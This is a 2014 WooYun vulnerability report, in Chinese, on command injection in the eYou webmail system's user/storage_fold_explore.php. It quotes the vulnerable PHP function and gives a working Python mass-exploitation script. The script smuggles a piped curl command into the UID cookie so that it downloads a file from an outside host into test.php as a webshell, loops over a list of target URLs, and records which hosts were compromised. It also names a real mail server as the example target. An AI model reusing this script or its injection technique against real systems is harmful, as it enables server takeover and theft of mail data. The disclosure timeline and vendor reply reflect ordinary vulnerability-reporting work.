乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-26: 细节已通知厂商并且等待厂商处理中 2014-04-30: 厂商已经确认,细节仅向厂商公开 2014-05-10: 细节向核心白帽子及相关领域专家公开 2014-05-20: 细节向普通白帽子公开 2014-05-30: 细节向实习白帽子公开 2014-06-10: 细节向公众公开
这套系统还有很多问题,能登录就更多问题了。
user/storage_fold_explore.php
<?php/** * 用户网络存储目录列表 * * 该页面显示登录邮箱用户的网络存储目录列表,选择后保存邮件附件到指定的目录中。 * * @author FengHui <[email protected]> * @copyright 199902008 eYou.net * @version storage_explore.php 2008/11/12 */require_once('/var/eyou/apache/htdocs/config.php');require_once(PATH.'inc/function.php');require_once(PATH.'inc/libeyou.php');require_once(PATH.'inc/operate.php');require_once(PATH.'inc/user.config.php');$skin = getCookieUserValue('SKIN');$uid = getCookieUserValue('UID');$domain = getCookieUserValue('DOMAIN');$user_dir_path = getUserDirPath($uid, $domain);$storage_index_path = $user_dir_path.'/storage/Index/';$storage_data_path = $user_dir_path.'/storage/Data/';$file_name = htmlspecialchars(get('file'));$att = htmlspecialchars(get('att'));?>
GetUser_DirPath在/inc/function.php下。
function getUserDirPath($uid, $domain) { $cmd = "/var/eyou/sbin/hashid $uid $domain"; $path = `$cmd`; $path = trim($path); return $path;}
利用代码:
__author__ = 'zengzhang'import time,sysimport urllib,urllib2from urlparse import urlparsedef Getwebshell(url): url=url.strip() header={"Cookie":"USER=UID%3d1|curl http://conqu3r.paxmac.org/test.txt>>test.php&DOMAIN%3d127.0.0.1"} try: request=urllib2.Request(url,None,headers=header) rep=urllib2.urlopen(request) except: pass Indentified(url)def Readfile(filen): fp=open(filen,'r') for url in fp: if url!='': Getwebshell(url)def Indentified(url): url=url[:-19] url=url+"test.php" try: f=urllib.urlopen(url).getcode() if f==200: fp=open("shell.txt","w+") fp.write(url+"\n") fp.close() except: passReadfile("url.txt")
url.txt内容为:http://mail.bjsasc.com/user/storage_fold_explore.php形式
你们懂的。。。
危害等级:高
漏洞Rank:15
确认时间:2014-04-30 10:59
和之前的重复了,已出补丁,多谢提供!
暂无